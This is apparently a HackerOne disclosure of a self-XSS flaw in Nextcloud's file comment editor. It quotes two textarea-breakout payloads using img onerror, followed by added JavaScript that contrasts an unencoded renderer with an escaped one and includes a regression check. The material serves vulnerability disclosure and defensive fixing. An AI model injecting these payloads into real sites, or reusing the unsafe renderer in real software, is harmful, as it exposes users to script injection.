Nextcloud: Reflected Self-XSS Vulnerability in the Comment section of Files (Different-payloads)

ID H1:164520
Type hackerone
Reporter shivakumar143
Modified 2016-08-31T13:08:24


Note: steps mentioned in report #164027

In the Comments Box, the payload to execute XSS is passed.

Test Payloads:


Also, the above payload is still working.

Also try this payload:

</textarea>"><img src=x onerror=prompt('XSS');>

</textarea><IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>



Click edit comment after posting.

XSS Triggers.
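
The payloads above begin with </textarea> and fire when the comment is opened for editing, which points to the stored comment being written into the edit form's textarea without HTML encoding. The following is an added example, not code from the report or from Nextcloud; the function names and the form template are assumptions. It shows that pattern next to an encoded version, with a regression check:

```javascript
// Constructed sample: one of the payloads quoted in the report above.
const SAMPLE_COMMENT = `</textarea>"><img src=x onerror=prompt('XSS');>`;

// Encode the five characters that are significant in HTML text and attributes.
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Unsafe pattern (assumed root cause): the stored comment is concatenated
// straight into the edit form, so "</textarea>" in the comment ends the element.
function renderEditFormUnsafe(comment) {
  return `<form class="edit"><textarea name="message">${comment}</textarea></form>`;
}

// Hardened pattern: the comment is encoded before it reaches the markup.
// In browser code, assigning textarea.value = comment avoids HTML parsing
// altogether and is the preferred fix when the form is built via the DOM.
function renderEditFormSafe(comment) {
  return `<form class="edit"><textarea name="message">${escapeHtml(comment)}</textarea></form>`;
}

// Regression check: return any markup that sits between the first
// </textarea> and the template's closing </form>. A correct render
// leaves nothing there; a non-empty result means the comment broke out.
function leakedMarkup(html) {
  const open = html.indexOf('>', html.indexOf('<textarea')) + 1;
  const close = html.toLowerCase().indexOf('</textarea', open);
  const tail = html.slice(close).replace(/^<\/textarea\s*>/i, '');
  return tail.replace(/<\/form>$/, '');
}

console.log('unsafe leak:', JSON.stringify(leakedMarkup(renderEditFormUnsafe(SAMPLE_COMMENT))));
console.log('safe leak:  ', JSON.stringify(leakedMarkup(renderEditFormSafe(SAMPLE_COMMENT))));
```
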